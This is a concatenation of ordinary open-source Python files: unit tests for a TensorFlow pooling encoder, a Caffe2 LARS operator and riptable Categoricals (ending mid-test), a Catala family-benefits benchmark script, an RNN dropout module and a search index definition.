Test Cases for PoolingEncoder.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import tensorflow as tf
import numpy as np
from seq2seq.encoders import PoolingEncoder
class PoolingEncoderTest(tf.test.TestCase):
"""
Tests the PoolingEncoder class.
"""
def setUp(self):
super(PoolingEncoderTest, self).setUp()
self.batch_size = 4
self.sequence_length = 16
self.input_depth = 10
self.mode = tf.contrib.learn.ModeKeys.TRAIN
def _test_with_params(self, params):
"""Tests the encoder with a given parameter configuration"""
inputs = tf.random_normal(
[self.batch_size, self.sequence_length, self.input_depth])
example_length = tf.ones(
self.batch_size, dtype=tf.int32) * self.sequence_length
encode_fn = PoolingEncoder(params, self.mode)
encoder_output = encode_fn(inputs, example_length)
with self.test_session() as sess:
sess.run(tf.global_variables_initializer())
encoder_output_ = sess.run(encoder_output)
np.testing.assert_array_equal(
encoder_output_.outputs.shape,
[self.batch_size, self.sequence_length, self.input_depth])
np.testing.assert_array_equal(
encoder_output_.attention_values.shape,
[self.batch_size, self.sequence_length, self.input_depth])
np.testing.assert_array_equal(encoder_output_.final_state.shape,
[self.batch_size, self.input_depth])
def test_encode_with_pos(self):
self._test_with_params({
"position_embeddings.enable": True,
"position_embeddings.num_positions": self.sequence_length
})
def test_encode_without_pos(self):
self._test_with_params({
"position_embeddings.enable": False,
"position_embeddings.num_positions": 0
})
if __name__ == "__main__":
tf.test.main() |
french_law/python/main.py | edwintorok/catala | 792 | 12687171 |
#!python3
from datetime import date
from src.allocations_familiales import PriseEnCharge_Code, Collectivite_Code
from src.api import allocations_familiales, Enfant
from src.catala import LogEvent, LogEventCode, reset_log, retrieve_log
import timeit
import argparse
from typing import List, Any
from termcolor import colored
def call_allocations_familiales() -> float:
return allocations_familiales(
date_courante=date(2020, 4, 20),
enfants=[
Enfant(id=0, remuneration_mensuelle=0,
date_de_naissance=date(2003, 2, 2),
prise_en_charge=PriseEnCharge_Code.EffectiveEtPermanente,
a_deja_ouvert_droit_aux_allocations_familiales=True),
Enfant(id=1, remuneration_mensuelle=300,
date_de_naissance=date(2013, 9, 30),
prise_en_charge=PriseEnCharge_Code.GardeAlterneePartageAllocations,
a_deja_ouvert_droit_aux_allocations_familiales=True)
],
ressources_menage=30000,
residence=Collectivite_Code.Metropole,
personne_charge_effective_permanente_est_parent=True,
personne_charge_effective_permanente_remplit_titre_I=True,
)
def benchmark_iteration():
money_given = call_allocations_familiales()
assert (money_given == 99.37)
def run_with_log() -> List[LogEvent]:
money_given = call_allocations_familiales()
assert (money_given == 99.37)
log = retrieve_log()
reset_log()
return log
def print_value(v: Any) -> str:
if isinstance(v, list):
return "[" + ",".join([str(x) for x in v]) + "]"
else:
return str(v)
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description='French law library in Python')
parser.add_argument('action', metavar='ACTION', type=str, nargs=1,
help="'bench' or 'show_log'")
args = parser.parse_args()
action = args.action[0]
if action == "bench":
iterations = 10000
print("Iterating {} iterations of the family benefits computation. Total time (s):".format(
iterations))
print(timeit.timeit(benchmark_iteration, number=iterations))
elif action == "show_log":
log = run_with_log()
indentation = 0
for log_event in log:
if log_event.code == LogEventCode.BeginCall:
print("{}{} {}".format(
"".ljust(indentation), colored("Begin call:", "yellow"), colored(" >> ".join(log_event.payload), "magenta"))) # type: ignore
indentation += 2
elif log_event.code == LogEventCode.EndCall:
indentation -= 2
print("{}{} {}".format(
"".ljust(indentation), colored("End call:", "yellow"), colored(" >> ".join(log_event.payload), "magenta"))) # type: ignore
elif log_event.code == LogEventCode.VariableDefinition:
headings, value = log_event.payload # type: ignore
print("{}{} {} {} {}".format(
"".ljust(indentation), colored("Variable definition:", "blue"), colored(" >> ".join(headings), "magenta"), colored(":=", "blue"), colored(print_value(value), "green"))) # type: ignore
elif log_event.code == LogEventCode.DecisionTaken:
print("{}{} {}".format(
"".ljust(indentation), colored("Decision taken:", "green"), colored("{}".format(log_event.payload), "magenta"))) # type: ignore
else:
print("Action '{}' not recognized!".format(action))
exit(-1)
|
matchzoo/modules/dropout.py | ChrisRBXiong/MatchZoo-py | 468 | 12687208 |
import torch.nn as nn
class RNNDropout(nn.Dropout):
"""Dropout for RNN."""
def forward(self, sequences_batch):
"""Masking whole hidden vector for tokens."""
# B: batch size
# L: sequence length
# D: hidden size
# sequence_batch: BxLxD
ones = sequences_batch.data.new_ones(sequences_batch.shape[0],
sequences_batch.shape[-1])
dropout_mask = nn.functional.dropout(ones, self.p, self.training,
inplace=False)
return dropout_mask.unsqueeze(1) * sequences_batch
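# --- hedged usage sketch (added illustration; not part of the original module) ---
# The mask above is sampled once per (batch, hidden) pair and broadcast over the
# sequence axis, so a dropped hidden unit is zeroed at every timestep of a
# sequence, unlike plain element-wise dropout.
if __name__ == "__main__":
    import torch
    torch.manual_seed(0)
    layer = RNNDropout(p=0.5)
    layer.train()
    x = torch.ones(2, 4, 8)  # batch=2, length=4, hidden=8
    y = layer(x)
    # the same hidden units are zeroed at the first and last timestep
    assert torch.equal(y[:, 0, :] == 0, y[:, -1, :] == 0)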
|
caffe2/python/operator_test/lars_test.py | Hacky-DH/pytorch | 60,067 | 12687218 |
from caffe2.python import core
from hypothesis import given
import caffe2.python.hypothesis_test_util as hu
import hypothesis.strategies as st
import numpy as np
class TestLars(hu.HypothesisTestCase):
@given(offset=st.floats(min_value=0, max_value=100),
lr_min=st.floats(min_value=1e-8, max_value=1e-6),
**hu.gcs)
def test_lars(self, offset, lr_min, dc, gc):
X = np.random.rand(6, 7, 8, 9).astype(np.float32)
dX = np.random.rand(6, 7, 8, 9).astype(np.float32)
wd = np.array([1e-4]).astype(np.float32)
trust = np.random.rand(1).astype(np.float32)
lr_max = np.random.rand(1).astype(np.float32)
def ref_lars(X, dX, wd, trust, lr_max):
rescale_factor = \
trust / (np.linalg.norm(dX) / np.linalg.norm(X) + wd + offset)
rescale_factor = np.minimum(rescale_factor, lr_max)
rescale_factor = np.maximum(rescale_factor, lr_min)
return [rescale_factor]
op = core.CreateOperator(
"Lars",
["X", "dX", "wd", "trust", "lr_max"],
["rescale_factor"],
offset=offset,
lr_min=lr_min,
)
self.assertReferenceChecks(
device_option=gc,
op=op,
inputs=[X, dX, wd, trust, lr_max],
reference=ref_lars
)
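# --- hedged worked example (added illustration; not part of the original test) ---
# A standalone numeric instance of the formula checked by ref_lars above, with
# made-up values and offset 0: rescale = trust / (||dX|| / ||X|| + wd), then
# clipped into [lr_min, lr_max].
if __name__ == "__main__":
    _X = np.ones(10, dtype=np.float32)
    _dX = 0.5 * np.ones(10, dtype=np.float32)
    _raw = 0.01 / (np.linalg.norm(_dX) / np.linalg.norm(_X) + 1e-4)  # ~0.019996
    print(float(np.clip(_raw, 1e-8, 1.0)))  # below lr_max, so unchanged by clipping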
|
waliki/search/search_indexes.py | luzik/waliki | 324 | 12687231 |
from waliki.models import Page
from haystack import indexes
class PageIndex(indexes.SearchIndex, indexes.Indexable):
text = indexes.CharField(document=True, use_template=True)
def get_model(self):
return Page
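# --- hedged note (added; not part of the original waliki module) ---
# With use_template=True, django-haystack builds the indexed text by rendering a
# template conventionally located at
#   templates/search/indexes/waliki/page_text.txt
# listing the Page fields to index (which exact fields waliki exposes there is an
# assumption here, e.g. something like "{{ object.title }}" plus the page body).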
|
riptable/tests/test_categorical.py | rtosholdings/riptable | 307 | 12687233 | import pytest
import os
import pandas as pd
import riptable as rt
from enum import IntEnum
from numpy.testing import assert_array_equal
from riptable import *
from riptable import save_sds, load_sds
from riptable import FastArray, Categorical, CatZero
from riptable.rt_categorical import Categories
from riptable.rt_enum import (
INVALID_DICT,
)
from riptable.rt_enum import (
DisplayLength,
DisplayJustification,
DisplayColumnColors,
)
from riptable.rt_enum import CategoryMode, TypeRegister
from riptable.rt_numpy import isnan, isnotnan, arange, ones
from riptable.tests.test_utils import (
get_categorical_data_factory_method,
get_all_categorical_data,
)
from riptable.rt_sds import SDSMakeDirsOn
from riptable.tests.utils import LikertDecision
# change to true since we write into /tests directory
SDSMakeDirsOn()
three_unicode = np.array(["AAPL\u2080", "AMZN\u2082", "IBM\u2081"])
three_bytes = FastArray([b'a', b'b', b'c'])
three_ints = FastArray([1, 2, 3])
compare_func_names = ['__ne__', '__eq__', '__ge__', '__gt__', '__le__', '__lt__']
int_success = [
np.array([True, False, True]), # ne
np.array([False, True, False]), # eq
np.array([False, True, True]), # ge
np.array([False, False, True]), # gt
np.array([True, True, False]), # le
np.array([True, False, False]), # lt
]
same_success = [
np.array([False, False, False]), # ne
np.array([True, True, True]), # eq
np.array([True, True, True]), # ge
np.array([False, False, False]), # gt
np.array([True, True, True]), # le
np.array([False, False, False]), # lt
]
diff_success = [
np.array([True, False, True]), # ne
np.array([False, True, False]), # eq
np.array([False, True, False]), # ge
np.array([False, False, False]), # gt
np.array([True, True, True]), # le
np.array([True, False, True]), # lt
]
ShowCompareInfo = False
list_bytes = [b'b', b'b', b'a', b'd', b'c']
list_unicode = ['b', 'b', 'a', 'd', 'c']
list_true_unicode = [u'b\u2082', u'b\u2082', u'a\u2082', u'd\u2082', u'c\u2082']
decision_dict = dict(zip(LikertDecision.__members__.keys(), [int(v) for v in LikertDecision.__members__.values()],))
def array_equal(arr1, arr2):
subr = arr1 - arr2
sumr = sum(subr == 0)
result = sumr == len(arr1)
if not result:
print("array comparison failed", arr1, arr2)
return result
class TestCategorical:
def _notimpl(self):
pytest.skip("This test needs to be implemented.")
def test_constructor(self):
# from pandas categorical
# from single parameter
# from two parameters
# ndarray
# python list
self._notimpl()
def test_ctor_list(self):
c_bytes = Categorical(list_bytes)
assert c_bytes.dtype == np.int8, f"Dtype {c_bytes.dtype} was not correct for construction from small list."
assert len(c_bytes) == 5, f"Length of underlying index array was incorrect for construction from bytes."
unique_bytes = np.unique(list_bytes)
assert np.all(
c_bytes._categories_wrap._list == unique_bytes
), f"Categories did not generate a unique list of categories from input bytes list."
c_unicode = Categorical(list_unicode)
assert c_unicode.dtype == np.int8, f"Dtype {c_unicode.dtype} was not correct for construction from small list."
assert len(c_unicode) == 5, f"Length of underlying index array was incorrect for construction from unicode."
assert (
len(c_unicode._categories_wrap) == 4
), f"Length of unique categories was incorrect for construction from unicode."
assert (
c_unicode._categories_wrap._list[0] == b'a'
), f"Unique categories were not sorted for construction from unicode."
assert c_unicode._categories_wrap._list.dtype.char == 'S', f"Unicode strings were not flipped to byte strings."
c_true_unicode = Categorical(list_true_unicode)
assert (
c_true_unicode.dtype == np.int8
), f"Dtype {c_true_unicode.dtype} was not correct for construction from small list."
assert (
len(c_true_unicode) == 5
), f"Length of underlying index array was incorrect for construction from true unicode."
assert (
len(c_true_unicode._categories_wrap) == 4
), f"Length of unique categories was incorrect for construction from true unicode."
assert (
c_true_unicode._categories_wrap._list[0] == u'a\u2082'
), f"Unique categories were not sorted for construction from true unicode."
assert (
c_true_unicode._categories_wrap._list.dtype.char == 'U'
), f"Unicode strings were not flipped to byte strings."
def test_ctor_nparray(self):
c_bytes = Categorical(np.array(list_bytes))
assert c_bytes.dtype == np.int8, f"Dtype {c_bytes.dtype} was not correct for construction from small list."
assert len(c_bytes) == 5, f"Length of underlying index array was incorrect for construction from bytes."
unique_bytes = np.unique(list_bytes)
assert np.all(
c_bytes._categories_wrap._list == unique_bytes
), f"Categories did not generate a unique list of categories from input bytes list."
c_unicode = Categorical(np.array(list_unicode))
assert c_unicode.dtype == np.int8, f"Dtype {c_unicode.dtype} was not correct for construction from small list."
assert len(c_unicode) == 5, f"Length of underlying index array was incorrect for construction from unicode."
assert (
len(c_unicode._categories_wrap._list) == 4
), f"Length of unique categories was incorrect for construction from unicode."
assert (
c_unicode._categories_wrap._list[0] == b'a'
), f"Unique categories were not sorted for construction from unicode."
assert c_unicode._categories_wrap._list.dtype.char == 'S', f"Unicode strings were not flipped to byte strings."
c_true_unicode = Categorical(np.array(list_true_unicode))
assert (
c_true_unicode.dtype == np.int8
), f"Dtype {c_true_unicode.dtype} was not correct for construction from small list."
assert (
len(c_true_unicode) == 5
), f"Length of underlying index array was incorrect for construction from true unicode."
assert (
len(c_true_unicode._categories_wrap._list) == 4
), f"Length of unique categories was incorrect for construction from true unicode."
assert (
c_true_unicode._categories_wrap._list[0] == u'a\u2082'
), f"Unique categories were not sorted for construction from true unicode."
assert (
c_true_unicode._categories_wrap._list.dtype.char == 'U'
), f"Unicode strings were not flipped to byte strings."
def test_ctor_values_and_cats(self):
v_bytes = [b'IBM', b'AAPL', b'AMZN', b'IBM', b'hello']
v_str = ['IBM', 'AAPL', 'AMZN', 'IBM', 'hello']
v_true = [
u'IBM\u2082',
u'AAPL\u2082',
u'AMZN\u2082',
u'IBM\u2082',
u'hello\u2082',
]
c_bytes = [b'AAPL', b'AMZN', b'IBM']
c_str = ['AAPL', 'AMZN', 'IBM']
c_true = [u'AAPL\u2082', u'AMZN\u2082', u'IBM\u2082']
v_correct = [2, 0, 1, 2, 3]
c_correct = [b'AAPL', b'AMZN', b'IBM', b'inv']
valid_v = [
v_bytes,
v_str,
np.array(v_bytes),
np.array(v_str),
FastArray(v_bytes),
FastArray(v_str),
]
valid_c = [
c_bytes,
c_str,
np.array(c_bytes),
np.array(c_str),
FastArray(c_bytes),
FastArray(c_str),
]
for v in valid_v:
vdt = None
if hasattr(v, 'dtype'):
vdt = v.dtype
else:
vdt = type(v)
for c in valid_c:
cdt = None
if hasattr(c, 'dtype'):
cdt = c.dtype
else:
cdt = type(c)
# error if no invalid provided
with pytest.raises(ValueError):
cat = Categorical(v, c)
# accept invalid and correctly assign
# cat = Categorical(v, c, invalid_category=b'inv')
# self.assertEqual(cat._categories.dtype.char, 'S', msg=f"Categorical from v: {vdt} and c: {cdt} did not flip categories to bytestring")
# v_is_correct = bool(np.all(v_correct == cat.view(FastArray)))
# self.assertTrue(v_is_correct, msg=f"Did not create the correct underlying index array from v: {vdt} and c: {cdt}")
# c_is_correct = bool(np.all(c_correct == cat._categories))
# self.assertTrue(c_is_correct, msg=f"Did not create the correct categories from v: {vdt} and c: {cdt}")
# v = v_true
# vdt = "TRUE unicode"
# for c in valid_c:
# if hasattr(c,'dtype'):
# cdt = c.dtype
# else:
# cdt = type(c)
# cat = Categorical(v,c)
# ---------------------------------------------------------------------------
def test_ctor_bad_index(self):
idx_list = [1, 2, 3, 4, 5]
str_list = ['a', 'b']
with pytest.raises(ValueError):
c = Categorical(idx_list, str_list)
# ---------------------------------------------------------------------------
def test_ctor_non_unique(self):
'''
riptable categoricals, like pandas categoricals, do not allow a non-unique list of categories when an index array is provided.
'''
idx_list = [0, 1]
str_list = ['b', 'b', 'a']
c = Categorical(idx_list, str_list)
# ---------------------------------------------------------------------------
def test_ctor_enum(self):
codes = [1, 44, 44, 133, 75]
c = Categorical(codes, LikertDecision)
# ---------------------------------------------------------------------------
def test_compare_enum_int(self):
compare_func_names = [
'__ne__',
'__eq__',
'__ge__',
'__gt__',
'__le__',
'__lt__',
]
codes = [1, 44, 44, 133, 75]
valid_idx = 44
bad_idx = 43
valid_idx_correct = [
FastArray([True, False, False, True, True]),
FastArray([False, True, True, False, False]),
FastArray([False, True, True, True, True]),
FastArray([False, False, False, True, True]),
FastArray([True, True, True, False, False]),
FastArray([True, False, False, False, False]),
]
bad_idx_correct = [
FastArray([True, True, True, True, True]),
FastArray([False, False, False, False, False]),
FastArray([False, True, True, True, True]),
FastArray([False, True, True, True, True]),
FastArray([True, False, False, False, False]),
FastArray([True, False, False, False, False]),
]
for d in (LikertDecision, decision_dict):
c = Categorical(codes, d)
# test valid integer code
for name, correct in zip(compare_func_names, valid_idx_correct):
func = c.__getattribute__(name)
result = func(valid_idx)
was_correct = bool(np.all(correct == result))
assert (
was_correct
), f"Categorical enum comparison failed with good integer index on {name} operation. {c.view(FastArray)} code: {valid_idx}"
# test invalid integer code
for name, correct in zip(compare_func_names, bad_idx_correct):
func = c.__getattribute__(name)
result = func(bad_idx)
was_correct = bool(np.all(correct == result))
assert was_correct, f"Categorical enum comparison failed with good integer index on {name} operation"
# ---------------------------------------------------------------------------
def test_compare_enum_str(self):
compare_func_names = [
'__ne__',
'__eq__',
'__ge__',
'__gt__',
'__le__',
'__lt__',
]
codes = [1, 44, 44, 133, 75]
valid_idx = 'StronglyAgree'
bad_idx = 'x'
valid_idx_correct = [
FastArray([True, False, False, True, True]),
FastArray([False, True, True, False, False]),
FastArray([False, True, True, True, True]),
FastArray([False, False, False, True, True]),
FastArray([True, True, True, False, False]),
FastArray([True, False, False, False, False]),
]
for d in (LikertDecision, decision_dict):
c = Categorical(codes, d)
# test valid category string
for name, correct in zip(compare_func_names, valid_idx_correct):
func = c.__getattribute__(name)
result = func(valid_idx)
was_correct = bool(np.all(correct == result))
assert was_correct, f"Categorical enum comparison failed with good category string on {name} operation"
# test invalid category string
for name in compare_func_names:
func = c.__getattribute__(name)
with pytest.raises(ValueError):
result = func(bad_idx)
def test_map(self):
c = Categorical(['b', 'b', 'c', 'a', 'd'], ordered=False)
mapping = {'a': 'AA', 'b': 'BB', 'c': 'CC', 'd': 'DD'}
result = c.map(mapping)
correct = FastArray([b'BB', b'BB', b'CC', b'AA', b'DD'])
assert bool(np.all(result == correct))
c = Categorical(['b', 'b', 'c', 'a', 'd'], ordered=False, base_index=0)
result = c.map(mapping)
assert bool(np.all(result == correct))
c = Categorical(['b', 'b', 'c', 'a', 'd'], ordered=False)
mapping = {'a': 'AA', 'b': 'BB', 'c': 'CC'}
result = c.map(mapping, invalid='INVALID')
correct = FastArray([b'BB', b'BB', b'CC', b'AA', b'INVALID'])
assert bool(np.all(result == correct))
c = Categorical(['b', 'b', 'c', 'a', 'd'], ordered=False, base_index=0)
result = c.map(mapping, invalid='INVALID')
assert bool(np.all(result == correct))
c = Categorical(['b', 'b', 'c', 'a', 'd'], ordered=False)
mapping = {'a': 1.0, 'b': 2.0, 'c': 3.0}
result = c.map(mapping, invalid=666)
correct = FastArray([2.0, 2.0, 3.0, 1.0, 666.0])
assert bool(np.all(result == correct))
c = Categorical(['b', 'b', 'c', 'a', 'd'], ordered=False, base_index=0)
result = c.map(mapping, invalid=666)
assert bool(np.all(result == correct))
c = Categorical(['b', 'b', 'c', 'a', 'd'], ordered=False)
result = c.map(mapping)
assert np.isnan(result[4])
c = Categorical(['b', 'b', 'c', 'a', 'd'], ordered=False, base_index=0)
result = c.map(mapping)
assert np.isnan(result[4])
c = Categorical(['b', 'b', 'c', 'a', 'd'], ordered=False)
mapping = FastArray(['w', 'x', 'y', 'z'])
result = c.map(mapping)
correct = FastArray([b'w', b'w', b'x', b'y', b'z'])
assert bool(np.all(result == correct))
c = Categorical(['b', 'b', 'c', 'a', 'd'], ordered=False, base_index=0)
result = c.map(mapping)
assert bool(np.all(result == correct))
c = Categorical([2, 2, 3, 1, 4, 0], ['a', 'b', 'c', 'd'])
mapping = {'a': 1.0, 'b': 2.0, 'c': 3.0}
result = c.map(mapping, invalid=666)
correct = FastArray([2.0, 2.0, 3.0, 1.0, 666.0, 666.0])
assert bool(np.all(result == correct))
# ---------------------------------------------------------------------------
def test_from_category(self):
c = Categorical(['a', 'a', 'b', 'c', 'a'])
bin = c.from_category('a')
assert bin == 1
c = Categorical(['a', 'a', 'b', 'c', 'a'], base_index=0)
bin = c.from_category(b'a')
assert bin == 0
with pytest.raises(ValueError):
bin = c.from_category('z')
c = Categorical(np.arange(5, 10))
bin = c.from_category(5)
assert bin == 1
with pytest.raises(ValueError):
bin = c.from_category(100)
c = Categorical([FastArray(['a', 'b', 'c']), np.arange(3)])
bin = c.from_category(('c', 2))
assert bin == 3
# ---------------------------------------------------------------------------
def test_getitem_enum_int(self):
codes = [1, 44, 44, 133, 75]
correct_strings = [
'StronglyDisagree',
'StronglyAgree',
'StronglyAgree',
'Agree',
'Disagree',
]
c = Categorical(codes, LikertDecision)
# getitem good init
for idx in range(5):
assert correct_strings[idx] == c[idx], f"Failed to return correct string for valid index in categorical."
# getitem bad init
with pytest.raises(IndexError):
result = c[5]
# ---------------------------------------------------------------------------
def test_getitem_enum_int_list(self):
codes = [1, 44, 44, 133, 75]
correct_strings = [
'StronglyDisagree',
'StronglyAgree',
'StronglyAgree',
'Agree',
'Disagree',
]
c = Categorical(codes, LikertDecision)
result = c[[1, 4]]
assert isinstance(
result, Categorical
), f"Failed to return Categorical when indexing by integer list. Returned {type(result)} instead."
assert result[0] == 'StronglyAgree'
assert result[1] == 'Disagree'
result = c[np.array([1, 4])]
assert isinstance(
result, Categorical
), f"Failed to return Categorical when indexing by integer list. Returned {type(result)} instead."
assert result[0] == 'StronglyAgree'
assert result[1] == 'Disagree'
result = c[FastArray([1, 4])]
assert isinstance(
result, Categorical
), f"Failed to return Categorical when indexing by integer list. Returned {type(result)} instead."
assert result[0] == 'StronglyAgree'
assert result[1] == 'Disagree'
def test_getitem_enum(self):
self._notimpl()
def test_setitem_enum(self):
self._notimpl()
# -------------------------------------------- MATLAB ----------------------------------
def test_ctor_matlab(self):
idx_list = [1.0, 2.0, 3.0, 4.0, 5.0]
str_list = ['a', 'b', 'c', 'd', 'e']
with pytest.raises(TypeError):
c = Categorical(idx_list, str_list)
c = Categorical(idx_list, str_list, from_matlab=True)
assert c[0] == 'a'
assert c.dtype == np.dtype(np.int8)
# def test_ctor_matlab_non_unique(self):
# idx_list = [1.0, 2.0, 3.0, 4.0, 5.0]
# str_list = ['a','b','c','d','d']
# with self.assertRaises(ValueError, msg=f"Failed to raise error when MATLab categories were not unique."):
# c = Categorical(idx_list, str_list, from_matlab=True)
# ------------------------------- PANDAS CATEGORICAL ----------------------------------
def test_ctor_pandas_cat(self):
idx_list = [0, 1, 2, 3, 4]
str_list = ['a', 'b', 'c', 'd', 'e']
pd_c = pd.Categorical.from_codes(idx_list, str_list)
pd_c = Categorical(pd_c)
rt_c = Categorical(idx_list, str_list)
cats_match = bool(np.all(pd_c.category_array == rt_c.category_array))
assert cats_match, f"Failed to create matching categories from pandas categorical"
# idx_match = bool(np.all(pd_c.view(np.ndarray)+1 == rt_c.view(np.ndarray)))
        # self.assertTrue(idx_match, msg=f"Failed to create matching underlying array from pandas categorical")
# convert pandas invalid bytes
pd_c = pd.Categorical.from_codes([-1, 0, 1, 2], ['a', 'b', 'c'])
pd_c = Categorical(pd_c)
cat_list = pd_c.category_array
assert len(cat_list) == 3
no_negative = bool(np.all(pd_c.view(FastArray) >= 0))
assert no_negative
# convert pandas invalid unicode
pd_c = pd.Categorical.from_codes([-1, 0, 1, 2], [u'\u2082', u'\u2083', u'\u2084'])
pd_c = Categorical(pd_c)
cat_list = pd_c.category_array
assert len(cat_list) == 3
no_negative = bool(np.all(pd_c.view(FastArray) >= 0))
assert no_negative
# --------------------------------RIPTABLE CATEGORICAL ----------------------------------------
# def test_ctor_rt_cat(self):
# c_unicode = Categorical(list_unicode)
# c = c_unicode.copy(forceunicode=True)
# self.assertEqual(c._categories_wrap._list.dtype.char, 'U', msg=f"Failed to force unicode on categorical copy.")
# ------------------------------------CUSTOM CATEGORIES ----------------------------------
def test_ctor_list_unique(self):
unique_str = ['a', 'b', 'c', 'd', 'e', 'f']
str_list = ['a', 'b', 'c', 'd', 'e']
c = Categorical(str_list, unique_str)
cats_match = bool(np.all(c._categories_wrap._list == unique_str))
assert cats_match, f"Failed to create matching categories from unique category input."
# ------------------------------------INTEGER ARRAY ----------------------------------
def test_ctor_integer_array(self):
lis = [1, 4, 9, 16, 25]
c = Categorical(lis)
for v1, v2 in zip(c, lis):
assert v1 == v2
# ------------------------------------GARBAGE ----------------------------------
def test_ctor_garbage(self):
with pytest.raises(TypeError):
c = Categorical(1, 2)
# ------------------------------------TEST FORCE DTYPE ----------------------------------
def test_init_with_dtype(self):
int_types = [np.int8, np.int16, np.int32, np.int64]
float_types = [np.float32, np.float64]
uint_types = [np.uint8, np.uint16, np.uint32, np.uint64]
arr = ['a', 'b', 'c', 'd', 'e']
for dt in int_types:
c = Categorical(arr, dtype=dt)
assert c.dtype == dt, f"Failed to force the correct dtype {dt} for categorical."
for dt in float_types + uint_types:
with pytest.raises(TypeError):
c = Categorical(arr, dtype=dt)
# ------------------------------------TEST CONVERT VALUE-------------------------------------
def test_possibly_convert_value(self):
'''
TODO: fix for new Categories class
'''
self._notimpl()
def test_categories_bad_init(self):
tup = ('a', 'b', 'c')
with pytest.raises(TypeError):
cat = Categories(tup)
def test_categories_len(self):
cats_from_list = Categorical(['a', 'b', 'c'], ordered=True, base_index=1, filter=None)._categories_wrap
assert len(cats_from_list) == 3
cats_from_enum = Categorical(FastArray([144]), LikertDecision)._categories_wrap
assert len(cats_from_enum) == 144
def test_get_categories(self):
c_list = [
'StronglyAgree',
'Agree',
'Disagree',
'StronglyDisagree',
'NeitherAgreeNorDisagree',
]
cats_from_list = Categories(c_list, unicode=True)
cats_from_enum = Categories(LikertDecision)
get_cats_match = bool(np.all(cats_from_list.get_categories() == cats_from_enum.get_categories()))
assert get_cats_match
def test_possibly_add_categories(self):
self._notimpl()
# uniquify and sort
# raise exception for adding cats to intenum, etc.
def test_categories_preserves_subtype(self):
# Test the Categorical.categories() method preserves the array type for the category data.
# This is important because we want the array(s) returned by this method to have the same type
# as the internal data (i.e. what's returned by Categorical.category_array or Categorical.category_dict).
# Single-key Categorical
dates = rt.Date(
[
'2019-03-15',
'2019-04-18',
'2019-05-17',
'2019-06-21',
'2019-07-19',
'2019-08-16',
'2019-09-20',
'2019-10-18',
'2019-11-15',
'2019-12-20',
]
)
dates.name = 'dates'
dates_cat = rt.Cat(dates)
cats = dates_cat.categories()
assert type(dates) == type(cats)
# Multi-key Categorical
datestrs = rt.FA(
[
'2019-03-15',
'2019-04-18',
'2019-05-17',
'2019-06-21',
'2019-07-19',
'2019-08-16',
'2019-09-20',
'2019-10-18',
'2019-11-15',
'2019-12-20',
]
)
datestrs.name = 'datestrs'
mcat = rt.Cat([dates, datestrs])
mcats = mcat.categories()
assert type(mcats['key_0']) == type(dates)
assert type(mcats['key_1']) == type(datestrs)
# Empty single-key Categorical
dates = rt.Date([])
dates_cat = rt.Cat(dates)
cats = dates_cat.categories()
assert type(dates) == type(cats)
def test_make_unique(self):
# SJK: changed this test on 8/21/2018 - count now comes from the grouping object, not Categories.make unique
values = FastArray(['a', 'b', 'c', 'c', 'd', 'a', 'b'])
# c = Categories([],base_index=1)
# index, cat_len, filter = c.make_unique(values)
cat = Categorical(values, ordered=True, base_index=1, filter=None)
index = cat._fa
c = cat._categories_wrap
assert len(index) == 7
assert max(index) == 4
assert c._mode == CategoryMode.StringArray
assert c._list.dtype.char == 'S'
assert c.isbytes
univals = values.astype('U')
cat = Categorical(univals, ordered=True, base_index=1, filter=None, unicode=True)
index = cat._fa
c = cat._categories_wrap
assert len(index) == 7
assert max(index) == 4
assert c._mode == CategoryMode.StringArray
assert c._list.dtype.char == 'U'
assert c.isunicode
@pytest.mark.xfail(
reason='20200416 This test was previously overridden by a later test in the file with the same name. Need to revisit and get back in a working state.'
)
def test_force_base_index(self):
filter = FastArray([True, True, False, False, True])
c = Categorical(['a', 'a', 'b', 'c', 'a'])
assert c.base_index == 1, 'Did not default base index to 1'
assert c._fa[0] == 1, 'Did not default base index to 1'
c = Categorical(['a', 'a', 'b', 'c', 'a'], base_index=0)
assert c.base_index == 0, 'Did not force base index to 0'
assert c._fa[0] == 0, 'Did not force base index to 0'
c = Categorical(['a', 'a', 'b', 'c', 'a'], filter=filter)
assert len(c.category_array) == 1
assert c._fa[2] == 0, 'Did not default base index to 1'
c = Categorical(['a', 'a', 'b', 'c', 'a'], base_index=0, filter=filter)
assert len(c.category_array) == 1
assert c._fa[2] == INVALID_DICT[c.dtype.num], 'Did not force base index to 0'
with pytest.raises(ValueError):
c = Categorical(['a', 'a', 'b', 'c', 'a'], base_index=99, filter=filter)
c = Categorical(['a', 'a', 'b', 'c', 'a'], ['a', 'b', 'c'])
assert c.base_index == 1, 'Did not default base index to 1'
assert c._fa[0] == 1, 'Did not default base index to 1'
c = Categorical(['a', 'a', 'b', 'c', 'a'], ['a', 'b', 'c'], base_index=0)
assert c.base_index == 0, 'Did not force base index to 0'
assert c._fa[0] == 0, 'Did not force base index to 0'
with pytest.raises(NotImplementedError):
c = Categorical(['a', 'a', 'b', 'c', 'a'], ['a', 'b', 'c'], base_index=0, filter=filter)
with pytest.raises(ValueError):
c = Categorical([1.0, 2.0, 3.0], ['a', 'b', 'c'], from_matlab=True, base_index=0)
pdc = pd.Categorical(['a', 'a', 'b', 'c', 'a'])
with pytest.raises(ValueError):
c = Categorical(pdc, base_index=0)
def test_is_in_unique_strings(self):
values = ['a', 'b', 'c', 'c', 'd', 'a', 'b']
good_cats = ['a', 'b', 'c', 'd']
incomplete_cats = ['a', 'b', 'c']
bad_cats = ['a', 'a', 'b']
invalid = 'invalid'
###--------REMOVED from_provided_categories, rewrite these tests to go through main constructor
# valid bytes
c = Categorical(values, good_cats, ordered=True, base_index=1, unicode=False, filter=None)
cats = c._categories_wrap
assert len(c) == 7
assert max(c._fa) == 4
assert cats._mode == CategoryMode.StringArray
assert cats._list.dtype.char == 'S'
assert cats.isbytes
# valid unicode
c = Categorical(values, good_cats, ordered=True, base_index=1, unicode=True, filter=None)
cats = c._categories_wrap
assert len(c) == 7
assert max(c._fa) == 4
assert cats._mode == CategoryMode.StringArray
assert cats._list.dtype.char == 'U'
assert cats.isunicode
# non-unique categories
# 4/12/2019 - no longer checks for uniqueness
# with self.assertRaises(ValueError):
# c = Categories.from_provided_categories(values, bad_cats, ordered=True, base_index=1, unicode=False, filter=None)
# not all values found in categories
with pytest.raises(ValueError):
c = Categorical(values, incomplete_cats, ordered=True, base_index=1, unicode=False, filter=None,)
# insert invalid True
# 5/16/2019 invalid must appear in provided uniques
with pytest.raises(ValueError):
c = Categorical(
